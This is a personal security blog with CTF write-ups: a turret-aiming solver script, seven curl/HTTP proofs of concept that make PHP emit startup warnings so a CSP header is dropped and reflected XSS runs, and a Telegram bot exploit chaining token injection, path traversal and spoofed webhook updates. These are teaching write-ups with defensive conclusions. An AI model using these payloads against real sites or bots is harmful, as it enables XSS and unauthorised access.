damned-me

Hello, world!

Tue, 01 Mar 2022 16:37:58 +0000

I’d like to keep it simple, I am a passionate computer science student, with a particular interest in systems and network security.

I like the CTFs that I often play with my team, dcode-us.

Every now and then I work as a freelance (I do the maintenance of some sites around on the internet) but I prefer to keep myself free from big commitments to continue my studies and be able to deepen in parallel the topics that fascinate me.

At the time of writing this post I am mainly focusing on binary exploitation and low level programming.

I’m not sure what I’m going to do with this blog, the idea is to keep it as a diary to publish my research, write-ups or just to post about what I find interesting. Also this is a spare time project, so it may happen that I don’t publish new content for a while.

Last disclaimer I would like to make is that my native language is not English, so I apologize in advance for any mistakes I will surely make in writing the posts.

Visit the about section to find out more about me.

Santa's Flakpanzerkampfwagen

Tue, 14 Dec 2021 00:00:00 +0000

CTF : X-MAS CTF 2021 First Weekend

Despite the name it was a relatively easy one. The problem can be resumed to “we are a turrets in (0, 0), all around us planes can spawn. We know the starting positions of the planes and the corresponding coordinates after 0.5 time units (TU). Shoot ‘em.”

With “shoot ‘em” I mean: give as output for each given plane <yaw> <distance> <delay>.

yaw refers to the rotation around the OZ axis, or the trigonometric angle with the positive side of the OX axis (in degrees).
distance is the distance from the origin that our shell need to travel before “exploding” (in space units, SU)
Last, we need to specify the delay, in TU from timestamp 0, to wait before shoot (the cannon will sort commands in a way that make sense before executing it). Inserting commands require 0 TU.

Our cannon have a range of 1300 SU, the planes must stay at least 1000 SU away from us (from the origin).

All the planes will spawn at 2000 SU from us. As time passes they will get closer but without necessarily pointing directly to the origin.

So, time for some maths!

An easy way to get the job done is tracing the direction of the plane until it get in range in order to calculate the trajectory. An easy way to do this is using the following snippet:

  # p0    = spawn point
# p1    = point after .5 TU
# dn    = distance from origin
# lenM  = cannon range
# t     = time

lenM = 1300
dn   = sqrt(p0[0]**2 + p0[1]**2)
pn   = p0
t    = 0

# P = (p.x + (p1.x - p0.y), p.y + (p1.y - p0.y0))
# D = sqrt(p.x**2 + p.y**2)
# T = T(p1) - T(p0) = 0.5 - 0

while (dn > lenM):
    pn = (pn[0] + (p1[0] - p0[0]), pn[1] + (p1[1] - p0[1]))
    dn = sqrt(pn[0]**2 + pn[1]**2) # new distance from origin
    t  += .5

Where p0 is the starting point, p1 the point after 0.5 TU and pn is the new point (fist initialized to p0).

We can then divide the distance of pn from the origin by the speed of the shell (900 SU/TU, given as hint of the challenge) and subtract it at the time passed t.

  t = t - (dn / 900)

Now that we have the point to aim for and the distance we can obtain the yaw in randians interpreting the 2 coordinates of pn as a vector (x, y) and then using the arctan2 function as follow:

  yaw = arctan2(pn[1], pn[0]) * (180 / 3.14159) 

Note the conversion from radians to degrees with 180 / 3.14159.

As the challenge’s description says

The shells have a decent blast radius, so you do not need to be pinpoint accurate.

So, if we want, we can also round up the results as follow

  yaw = round(yaw, 5)
t   = round(t, 5)
dn  = round(dn, 5)

We can then iterate every given plane at each level and than get the flag!

The complete code:

  #! /bin/python3

import re
from pwn import *
from numpy import *

lenM = 1300
dt   = .5

regex = r"([0-9]+):\ \(((-?[0-9]*\.[0-9]*[,|)]?\ ?){2})\ ->\ \(((-?[0-9]*\.[0-9]*[,|)]?\ ?){2})"
reg = re.compile(regex)

p = remote('challs.xmas.htsp.ro', 6003)
p.recvuntil(b'elf>')
p.send(b'\n')
p.recvuntil(b'elf>')
p.send(b'\n')
p.recvuntil(b'yes>')
p.send(b'\n')
p.recvuntil(b'ready>')
p.send(b'\n')
while True:
    try:
        line = p.recvline().decode()
    except:
        break

    print(line)

    res = reg.match(line)
    
    if(res is None):
        continue

    p0 = res.group(2).split(',')
    p1 = res.group(4).split(',')
    
    p0[0] = float(p0[0])
    p0[1] = float(p0[1].replace(')', '').replace(' ', ''))
    p1[0] = float(p1[0])
    p1[1] = float(p1[1].replace(')', '').replace(' ', ''))
    
    dn = sqrt(p0[0]**2 + p0[1]**2)
    pn = p0
    t = 0

    while (dn > lenM):
        pn = (pn[0] + (p1[0] - p0[0]), pn[1] + (p1[1] - p0[1]))
        dn = sqrt(pn[0]**2 + pn[1]**2) 
        t += dt

    yaw = arctan2(pn[1], pn[0]) * (180 / 3.14159)  
    t = t - (dn/900)

    yaw = round(yaw, 5)
    t   = round(t, 5)
    dn  = round(dn, 5)

    send = ' '.join([str(yaw), str(dn), str(t)])
    print(send)
    p.sendline((send).encode('ascii'))

I used pwntools for communications and numpy to perform the maths, than the standard python’s regex library to parse inputs.

After running the script and defending the position, the program will print out our flag:

X-MAS{4NY_PR0bl3m_c4n_B3_S0lv3d_W17h_4_b16_3n0u6H_C4NN0N_hj9jh98j94}

Pilvar CSP

Fri, 03 May 2024 00:00:00 +0000

This weekend a friend of mine retweeted a very interesting challenge by @pilvar222.

This Friday, I’m presenting a novel technique as part of my talk “Secret web hacking knowledge - CTF authors hate these simple tricks”. I’ve made a challenge about it, will you be able to pop an alert on pilv.ar ? The whole source code is in the screens below :)

— pilvar (@pilvar222) April 23, 2024

The challenge

The code is very minimal and it consist of a Dockerfile:

  FROM php:apache
COPY index.php /var/www/html

and a PHP source:

  <?php
header("Content-Security-Policy: default-src 'none';");
if (isset($_GET["xss"])) echo $_GET["xss"];

The goal was simple: pop an alert on the domain http://pilv.ar/ (hosting the above code).

Solves

As the CSP was very strict the only way to accomplish was to find a way of breaking the PHP backend code. After some random attempt I noticed that if I modify the code in a way that a Warning was issued before the call to header.

  <?php
trigger_error("error", E_USER_WARNING);
header("Content-Security-Policy: default-src 'none';");
if (isset($_GET["xss"])) echo $_GET["xss"];

This message was reported on the page:

As you can see the Content-Security-Policy header is not sent anymore. The warning message gets in the PHP buffer before the header could be set, but the payload we sent gets reflected anyway. So if we can trigger a Warning and get a reflection of the payload, we could solve the challenge. I then asked myself: what happens before the first line of code is executed in PHP? And then answered my own question: the superglobal arrays _GET, _POST, _FILES and _COOKIE are initialized.

I’m not a PHP savy so the only way to understand what to do was look at the source code looking for what could go wrong at that stage.

At first I used GitHub source code search function, and get frustrated pretty quickly as I wasn’t able to find what I was looking for. The search function uses symbols and the PHP source code is written in a mix of C and PHP itself, so it wasn’t working at all. I wanted to grep pure text and the only way was to download the entire repo and ripgrep it locally.

Searching for _COOKIE I found that apparently the superglobals arrays are set by the code at php-src/main/php_variables.c:108, in particular an interesting piece of code was:

  ...
/* do not output the error message to the screen, this helps us to avoid "information disclosure" */
if (!PG(display_errors)) {
	php_error_docref(NULL, E_WARNING, "Input variable nesting level exceeded " ZEND_LONG_FMT ". To increase the limit changemax_input_nesting_level in php.ini.", PG(max_input_nesting_level));
}
...

Apparently, PHP limits the input variable nesting, and the limit is set to 64 by the default php.ini settings:

  STD_PHP_INI_ENTRY("max_input_nesting_level", "64", PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateLongGEZero, max_input_nesting_level, php_core_globals, core_globals)

Indeed, visiting the following link causes PHP to generate a warning: http://pilv.ar/?xss[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=a0

However, in this case, unfortunately, the error is not suitable for solving the challenge, because:

PHP does not set the nested variable at all
The nature of the warning prevents the payload to be reflected
The warning is raised by echo that appears after the header call, so the CSP header is still sent.

I needed something that breaks the superglobal parsing routines.

After digging a little more in the sources, I found the rfc1867.c file, and grepping for WARNING returned the following:

grep "WARNING" ~/repos/php-src/main/rfc1867.c

  ...
EMIT_WARNING_OR_ERROR("POST Content-Length of " ZEND_LONG_FMT " bytes exceeds the limit of " ZEND_LONG_FMT " bytes", SG(request_info).content_length, post_max_size);
EMIT_WARNING_OR_ERROR("Missing boundary in multipart/form-data POST data");
EMIT_WARNING_OR_ERROR("Invalid boundary in multipart/form-data POST data");
EMIT_WARNING_OR_ERROR("Multipart body parts limit exceeded %d. To increase the limit change max_multipart_body_parts in php.ini.", body_parts_limit);
EMIT_WARNING_OR_ERROR("Input variables exceeded " ZEND_LONG_FMT ". To increase the limit change max_input_vars in php.ini.", max_input_vars);
EMIT_WARNING_OR_ERROR("Maximum number of allowable file uploads has been exceeded");
EMIT_WARNING_OR_ERROR("File Upload Mime headers garbled");
EMIT_WARNING_OR_ERROR("File upload error - unable to create a temporary file");
EMIT_WARNING_OR_ERROR("Uploaded file size 0 - file [%s=%s] not saved", param, filename);
...

And we are done, the latter command conveniently lists multiple solutions to the challenge!

Let’s try them (as some of the payloads would be very large I preferred to do this locally on a dedicated environment to keep the PoCs simple, but you can test the real sized ones on your side if you like).

POST Content-Length exceeds the limit

I cheated a bit for this one, by setting the limit of PHP post_max_size to 1 byte (php -n -dpost_max_size=1 -S 0.0.0.0:1337 index.php). By default the PHP documentation indicates it is 8M.

Command:

  curl --path-as-is -i -s -k -X $'POST' \
	-H $'Content-Type: multipart/form-data; boundary=-' -H $'Content-Length: 2' \
	--data-binary $'\x0d\x0a' \
	$'http://localhost:1337/?xss=<script>alert()</script>'

Request:

  POST /?xss=<script>alert()</script> HTTP/1.1
Content-Type: multipart/form-data; boundary=-
Content-Length: 2

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 14:24:02 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  POST Content-Length of 2 bytes exceeds the limit of 1 bytes in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

Missing boundary in multipart/form-data POST data

Command:

  curl --path-as-is -i -s -k -X $'POST' \
	-H $'Content-Type: multipart/form-data;' \
	$'http://localhost:1337/?xss=<script>alert()</script>'

Request:

  POST /?xss=<script>alert()</script> HTTP/1.1
Content-Type: multipart/form-data;

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 14:02:26 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  Missing boundary in multipart/form-data POST data in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

Invalid boundary in multipart/form-data POST data

Command:

  curl --path-as-is -i -s -k -X $'POST' \
	-H $'Content-Type: multipart/form-data; boundary=\"' \
	$'http://localhost:1337/?xss=<script>alert()</script>'

Request:

  POST /?xss=<script>alert()</script> HTTP/1.1
Content-Type: multipart/form-data; boundary="

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 14:08:54 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  Invalid boundary in multipart/form-data POST data in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

Multipart body parts limit exceeded

Here I cheated again, by setting max_multipart_body_part to 1 (php -n -dmax_multipart_body_parts=1 -S 0.0.0.0:1337 index.php). In the php.ini-production and php.ini-development files the default is 1500.

Command:

  curl --path-as-is -i -s -k -X $'POST' \
	-H $'Content-Type: multipart/form-data; boundary=-' -H $'Content-Length: 105' \
	--data-binary $'---\x0d\x0aContent-Disposition: form-data; name=\"a\"\x0d\x0a\x0d\x0a\x0d\x0a---\x0d\x0aContent-Disposition: form-data; name=\"b\"\x0d\x0a\x0d\x0a\x0d\x0a---' \
	$'http://localhost:1337/?xss=<script>alert()</script>'

Request:

  POST /?xss=<script>alert()</script> HTTP/1.1
Content-Type: multipart/form-data; boundary=-
Content-Length: 105

---
Content-Disposition: form-data; name="a"


---
Content-Disposition: form-data; name="b"


---

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 14:34:18 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  PHP Request Startup: Multipart body parts limit exceeded 1. To increase the limit change max_multipart_body_parts in php.ini. in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

Input variables exceeded

This was also my submitted solution, so I’ll append a screenshot of the exploit working on the original challenge website (PoC).

On my local environment this is as follows (php -n -dmax_input_vars=1 -S 0.0.0.0:1337 index.php). PHP sets max_input_vars to 1000 by default.

Command:

  curl --path-as-is -i -s -k -X $'GET' \
	$'http://localhost:1337/?xss=<script>alert()</script>&a'

Request:

  GET /?xss=<script>alert()</script>&a HTTP/1.1

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 14:32:14 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  PHP Request Startup: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

Maximum number of allowable file uploads has been exceeded

For this I tweaked the PHP init vars again, and sent multiple files in a single request, exceeding the limit of the preprocessor (php -n -dmax_file_uploads=1 -S 0.0.0.0:1337 index.php). The default limit indicated by the PHP documentation is 20.

Command:

  curl --path-as-is -i -s -k -X $'POST' \
	-H $'Content-Type: multipart/form-data; boundary=-' -H $'Content-Length: 185' \
	--data-binary $'---\x0d\x0aContent-Disposition: form-data; name=\"1\"; filename=\"1\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a---\x0d\x0aContent-Disposition: form-data; name=\"2\"; filename=\"2\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a---' \
	$'http://localhost:1337/?xss=<script>alert()</script>&a'

Request:

  POST /?xss=<script>alert()</script>&a HTTP/1.1
Content-Type: multipart/form-data; boundary=-
Content-Length: 185

---
Content-Disposition: form-data; name="1"; filename="1"
Content-Type: text/plain


---
Content-Disposition: form-data; name="2"; filename="2"
Content-Type: text/plain


---

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 14:49:27 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  Maximum number of allowable file uploads has been exceeded in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

File Upload Mime headers garbled

At first, I didn’t understand with just the code what this error meant

  ...
/* Return with an error if the posted data is garbled */
if (!param && !filename) {
	EMIT_WARNING_OR_ERROR("File Upload Mime headers garbled");
	goto fileupload_done;
}
...

So, to avoid reading the whole file, I’ve just took a look at the relative unit-test and I finally understood that by removing file, name and Content-Type form the multipart segment the Warning is triggered:

Command:

  curl --path-as-is -i -s -k -X $'POST' \
	-H $'Content-Type: multipart/form-data; boundary=-' -H $'Content-Length: 44' \
	--data-binary $'---\x0d\x0aContent-Disposition: form-data\x0d\x0a\x0d\x0a\x0d\x0a---' \
	$'http://localhost:1337/?xss=<script>alert()</script>'

Request:

  POST /?xss=<script>alert()</script> HTTP/1.1
Content-Type: multipart/form-data; boundary=-
Content-Length: 44

---
Content-Disposition: form-data


---

Response:

  HTTP/1.1 200 OK
Host: localhost:1337
Date: Mon, 29 Apr 2024 15:37:55 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  File Upload Mime headers garbled in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent in <b>/home/damned-me/pilvar/src/index.php</b> on line <b>2</b><br />
<script>alert()</script>

Not applicable solutions

About the last two warning, as far I have understood, I’d say they are not applicable for the following reasons:

File upload error - unable to create a temporary file: This depends on server-side disk space and we have no way of filling up the disk space from the client (at least in this challenge setup).
Uploaded file size 0: There is no way that I’m aware of to trigger a 0 length file upload Warning with the current setup. Even sending an empty frame does not result in any backend malfunction. So after a while I give up on this, as I was already satisfied with the 7 presented solutions. If some of you know a way to exploit this, please, let me know!

Conclusions

This is a remarkable example of the security implications of a production environment with developer mode enabled, the insecure-by-design issues that arise with minimal or naive installations, and the potential flaws present not only in code explicitly produced by developers but also in implicit language mechanics, which allow a seemingly bulletproof and elementary code, to be vulnerable to a complete bypass of the rules specified by the programmer.

References

TuriCTF - Telegram Bot Exploitation

Sun, 27 Apr 2025 00:00:00 +0000

CTF: https://ctf.turi.space

This CTF serves as a good introduction to the nieche topic of Telegram Bot Exploitation. It is inspired by a real-world attack path originally discovered by the challenge author, @davtur19. The original exploit led to remote code execution (RCE) on the target host, but for the sake of this challenge, the exploit has been nerfed and only allows the player to retrieve the flag.

Telegram Bots Introduction

I’ll start with a brief introduction to Telegram Bots, citing the docs:

Telegram Bots are special accounts that do not require an additional phone number to set up. These accounts serve as an interface for code running somewhere on your server.

Telegram bots are managed using The Botfather, which is itself a bot. It allows you to create bot tokens and manage bot accounts.

Programatic interaction with bots occurs through the Telegram Bot API. Users interact with bots through regular chats. Bots can also be added to groups and are often used to manage them; examples include GroupHelp and MissRose. It’s needless to say that leaking the token of such bots would allow an attacker to escalate their privileges in the group chats where the bots are present, gaining the same level of access as the bot itself.

Challenge Analysis

The challenge is presented to the user as a simple Telegram bot. Using the /help command returns a message listing all available commands.

Let’s start by cloning the bot and running some tests.

“Cloning” a bot on Telegram generally refers to a feature implemented by the developer of the main bot, allowing you to use your own bot account with their service. In practice, you provide your bot’s session (token) to the service provider, so that you can customize your bot’s profile picture, name, username, and so on. However, the actual code and the logic that powers the bot are managed by the service you’ve chosen to use.

One of the first steps when analyzing Telegram Bots is identifying the host on which the bot is running.

While there are multiple ways an attacker might leak the bot’s hosting information, since we provide the token and the bot is using a web hook, we can retrieve it using the getWebhookInfo API.

  $ curl https://api.telegram.org/bot<TOKEN>/getWebhookInfo
{
  "ok": true,
  "result": {
	"url": "https://ctf.turi.space/php/bot/bot.php?token=bot<TOKEN>",
	"has_custom_certificate": false,
	"pending_update_count": 0,
	"max_connections": 2,
	"ip_address": "172.67.185.107"
  }
}

The bot is receiving updates on https://ctf.turi.space/php/bot/bot.php.

Source Analysis

Now that we’ve dynamically gathered some basic information about the application we’re dealing with, let’s move on and see if the code (download), a pretty short PHP script, hides any juicy secrets.

The first thing we notice is that the library used to interact with the Bot API is a patched version of TuriBot. The patch allows every API call to be made using only GET parameters. Updates pushed from the server to the bot are retrieved by the library using the getUpdate() function.

  define('NICKNAMEBOT', '@TuriCtfBot');
define('MYID', 25370519);
define('BOTID', 1080715096);
define('GROUP_ADMIN', -1001419922565); # @TuriCtfGroup
define('FLAG_CHATID', -1001328052549); # CTF Winner (flag)


if (!isset($_GET['token'])) {
	exit('token missing');
}
$token = $_GET['token'];

require_once __DIR__ . '/../botlib/vendor/autoload.php';

// patched to use GET only
use TuriBot\Client;

$client = new Client($token, false);
$update = $client->getUpdate();
if (!isset($update)) {
	exit('json error');
}

We are most intrested in the /flag handler

  if ($u->command('/flag')) {
	// Check if you are admin of the BOT
	$is_bot_admin = file_get_contents("/code/ctf/data/botAdmins/$user_id.txt");
	if ($is_bot_admin === false) {
		echo "Unauthorized, you are not in botAdmins\n";
		$client->sendMessage($chat_id, "Unauthorized, you are not in botAdmins");
	} elseif ($is_bot_admin == $user_id) {
		if ((stripos(substr($token, 3), (string)BOTID)) !== 0) {
			$client->sendMessage($chat_id, "Use the main bot, not a clone");
		} else {
			$link = $client->exportChatInviteLink(FLAG_CHATID);
			if ($link->ok and isset($link->result)) {
				$client->sendMessage($chat_id, "Flag: {$link->result}");
			} else {
				$client->sendMessage($chat_id,
					"Link generation error: or try again later, if the problem persists please contact @davtur19");
			}
		}
	} else {
		echo "Unauthorized, the user id in the file is not valid\n";
		$client->sendMessage($chat_id, "Unauthorized, the user id in the file is not valid");
	}
}

The flag is an invite link to a group (FLAG_CHATID). It is guarded by some checks that verify if the user has a corresponding file with their user ID inside /code/ctf/data/botAdmins/$user_id.txt.

From here, we know that we must be able to upload a file and write arbitrary content to it in order to solve the challenge. Let’s keep this in mind and proceed with our analysis.

We can see that the only write primitive with somewhat “arbitrary” content is present in the following file upload handler.

  if (isset($update->message->document->file_id)) {
	// Commands for admins
	$is_chat_admin = file_get_contents("/code/ctf/data/chatAdmins/$user_id.txt");
	if ($is_chat_admin) {
		$file_name = $update->message->document->file_name;
		$file = $client->getFile($update->message->document->file_id);
		if ($file->ok and isset($file->result->file_path)) {
			$file_path = $file->result->file_path;
			$endpoint = "http://nginxctf/file/" . $token . "/"; // nginxctf = api.telegram.org
			$curl = curl_init();
			curl_setopt_array($curl, [
				CURLOPT_URL            => $endpoint . $file_path,
				CURLOPT_RETURNTRANSFER => true,
			]);
			$resultCurl = curl_exec($curl);
			if (strlen($file_name) <= 100) {
				if (strlen($resultCurl) <= 4096) {
					if (ctype_alnum($resultCurl)) {
						$file = file_put_contents("/code/ctf/data/files/$user_id$file_name.txt", $resultCurl);
						if ($file === false) {
							echo "Failed to write in /data/files/\n";
						} else {
							$client->sendMessage($chat_id, "Document saved in /data/files/$user_id$file_name.txt");
						}
					} else {
						echo "Error: invalid character in file\n";
						$client->sendMessage($chat_id, "Error: invalid character in file");
					}
				} else {
					echo "Error: file too big\n";
					$client->sendMessage($chat_id, "Error: file too big");
				}
			} else {
				echo "Error: file name too long\n";
				$client->sendMessage($chat_id, "Error: file name too long");
			}
		}
	} else {
		echo "Unauthorized\n";
		$client->sendMessage($chat_id, "Unauthorized");
	}
}

We notice two problems here:

The code checks if /code/ctf/data/chatAdmins/$user_id.txt exists; this check is similar to the one present in the /flag handler, but without the need for the user ID to be inside the file.
The data written to the file comes directly from a response from api.telegram.org, which, in theory, we cannot control.

Lastly, we have another interesting construct in the code:

  // Check if you are admin of the GROUP
$getAdmins = $client->getChatAdministrators(GROUP_ADMIN);
if ($getAdmins->ok) {
	foreach ($getAdmins->result as $user) {
		$userid = $user->user->id;
		$file = file_put_contents("/code/ctf/data/chatAdmins/$userid.txt", "1");
		if ($file === false) {
			echo "Failed to write in /data/chatAdmins/\n";
		}
	}
} else {
	echo "Failed to get Group Admins\n";
}

Note the first line of code in the snippet above. It’s a call to the getChatAdministrators bot API. That call return “true” only if the user calling it’s an admin of the GROUP_ADMIN group. If that first condition is met, for each of the user returned by the API call a file named with the user id is written on /code/ctf/data/chatAdmins/.

As of now, we don’t have any way to get to our goal. Let’s expand the scope and take a quick look at the library that is managing the requests to Telegram.

I’ll make it brief as it’s the only part that concerns us. While looking at the constructor, we can see right away that the token parameter is not sanitized when constructing the $endpoint variable.

  /*
 * @param string $token Bot API token
 * @param bool $json_payload if true enable json payload, otherwise use always curl
 * @param string $endpoint custom endpoint url for self-hosted BotApi
 * @param array $curl_options change curl settings, to be able to use a proxy or something else, use it at your own risk
 */

public function __construct(
	string $token,
	bool $json_payload = false,
	string $endpoint = "https://api.telegram.org/bot",
	array $curl_options = []
) {
	$this->endpoint = $endpoint . $token . "/";
	$this->json_payload = $json_payload;
	$this->curl = curl_init();

	curl_setopt_array($this->curl, [
		CURLOPT_RETURNTRANSFER => true,
		CURLOPT_POST           => true,
		CURLOPT_FORBID_REUSE   => true,
		CURLOPT_HEADER         => false,
		CURLOPT_TIMEOUT        => 120,
		CURLOPT_HTTPHEADER     => ["Connection: Keep-Alive", "Keep-Alive: 120"],
	])

To understand why the write is failing, it’s sufficient to take a look at the response of the following calls.

  $ curl -I https://ctf.turi.space/data/chatAdmins/ | head -n 1
HTTP/2 404

$ curl -I https://ctf.turi.space/data/ | head -n 1
HTTP/2 403

The chatAdmins folder does not exist on the host.

We need to traverse the path at line 79 injecting $userid

          foreach ($getAdmins->result as $user) {
            $userid = $user->user->id;
            $file = file_put_contents("/code/ctf/data/chatAdmins/$userid.txt", "1");
            if ($file === false) {
                echo "Failed to write in /data/chatAdmins/\n";
            }
        }

so that the file_put_contents writes the data inside /code/ctf/data/botAdmins, allowing us to pass the first if at line 135 in the /flag handler.

  if ($u->command('/flag')) {
	// Check if you are admin of the BOT
	$is_bot_admin = file_get_contents("/code/ctf/data/botAdmins/$user_id.txt");
	if ($is_bot_admin === false) {
		echo "Unauthorized, you are not in botAdmins\n";
		$client->sendMessage($chat_id, "Unauthorized, you are not in botAdmins");
	}

As the user ID is taken from the response to the Telegram API, it’s necessary to somehow control the response from it.

This is, in my opinion, the most interesting part of the challenge.

Telegram allows retrieving uploaded files using getFile and a special API path.

The file can then be downloaded via the link https://api.telegram.org/file/bot<token>/<file_path>, where <file_path> is taken from the response.

We can then upload a file like the following to our chat with the cloned bot.

  $ cat admin.json | jq
{
  "ok": true,
  "result": [
	 {
	  "user": {
		"id": "../botAdmins/31337",
		"is_bot": false,
		"first_name": "damned-me",
		"username": "<username>",
		"language_code": "en"
	  },
	  "status": "creator",
	  "is_anonymous": false
	}
  ]
}

and retrieve its file ID from the Telegram API using getUpdates.

  GET /bot<TOKEN>/getUpdates HTTP/2
Host: api.telegram.org

  HTTP/2 200 OK
Content-Type: application/json
Content-Length: 490

{
  "ok": true,
  "result": [
	{
	  "update_id": 305746679,
	  "message": {
		"message_id": 5,
		"from": {
		  "id": 31337,
		  "is_bot": false,
		  "first_name": "damned-me",
		  "username": "<username>",
		  "language_code": "en"
		},
		"chat": {
		  "id": 31337,
		  "first_name": "damned-me",
		  "username": "<username>",
		  "type": "private"
		},
		"date": 1744239778,
		"document": {
		  "file_name": "admin.json",
		  "mime_type": "application/json",
		  "file_id": "BQACAgQAAxkBAAMFZ_b8oiRncs4hznFqOQQQPuzt6ugAAl8XAAI-17lTReJi3bM37XU2BA",
		  "file_unique_id": "AgADXxcAAj7XuVM",
		  "file_size": 367
		}
	  }
	}
  ]
}

The file_id can be passed as a parameter to getFile: https://api.telegram.org/bot<TOKEN>/getFile?file_id=<FILE_ID>.

  GET /bot<TOKEN>/getFile?file_id=BQACAgQAAxkBAAMFZ_b8oiRncs4hznFqOQQQPuzt6ugAAl8XAAI-17lTReJi3bM37XU2BA HTTP/2
Host: api.telegram.org

  HTTP/2 200 OK
Content-Type: application/json
Content-Length: 192

{
  "ok": true,
  "result": {
	"file_id": "BQACAgQAAxkBAAMFZ_b8oiRncs4hznFqOQQQPuzt6ugAAl8XAAI-17lTReJi3bM37XU2BA",
	"file_unique_id": "AgADXxcAAj7XuVM",
	"file_size": 367,
	"file_path": "documents/file_0.json"
  }
}

Now, by chaining the token injection with path traversal and appending # to truncate the excess content, the following request will spoof an update to the bot, causing it to send a request to the download endpoint instead of getChatAdministrators.

  POST /php/bot/bot.php?token=/../file/bot<TOKEN>/documents/file_0.json%23 HTTP/2
Host: ctf.turi.space
Content-Type: application/json
Content-Length: 110

{
	"message": {
		"from": { "id": "31337" },
		"chat": { "id": "-1001878339899" }
	}
}

The response will contain the file we previously uploaded, which includes a JSON object with the tampered user ID. With this we can already notice a change in the behavior of the bot when requesting the flag.

However, we’re not quite there yet. We still need to write our ID inside that file. To do so, we repeat the same process: upload a file containing our user ID, then spoof another update, this time simulating a file upload event.

  POST /php/bot/bot.php?token=<TOKEN> HTTP/2
Host: ctf.turi.space
Content-Type: application/json
Content-Length: 307

{
	"message": {
			"from": { "id": "../botAdmins/31337" },
			"chat": { "id": "-1001878339899" },
			"document": {
			"file_id":"<FILE_ID_CONTAINING_MY_ID>",
			"file_name":"",
			"file_path":"documents/file_1.json"
		}
	}
}

The bot has now written the content we provided into the file in /data/botAdmins. This time, calling /flag will return the invite link as the flag, and the challenge is successfully solved.

Conclusions

As already mentioned, this challenge was inspired by a real-world scenario. It’s worth highlighting how it ultimately led to remote code execution on a production server. The code was leaked through a separate vulnerability chain. The folder where files were uploaded wasn’t publicly accessible, which made a path traversal on an exposed endpoint necessary. Finally, and perhaps most obviously, the uploaded file contained a PHP reverse shell.

Multiple flaws contributed to this exploit chain: the lack of webhook authorization, an injectable parameter, a path traversal vulnerability, and an arbitrary file write with controlled content. Pretty neat.

On top of that, there are a few design issues. First of all, I find it very unsafe that files are served under the same domain as the Telegram APIs; I would definitely recommend using a separate subdomain for that. Second, the bot’s support for API calls via GET requests was crucial in enabling this kind of injection.

I’ll leave here a useful resource: Securing & Hardening your Telegram Bot

As a side note, Telegram has introduced a new header, X-Telegram-Bot-Api-Secret-Token, that can be leveraged to authenticate API calls. If you’re curious, check out the setWebhook documentation.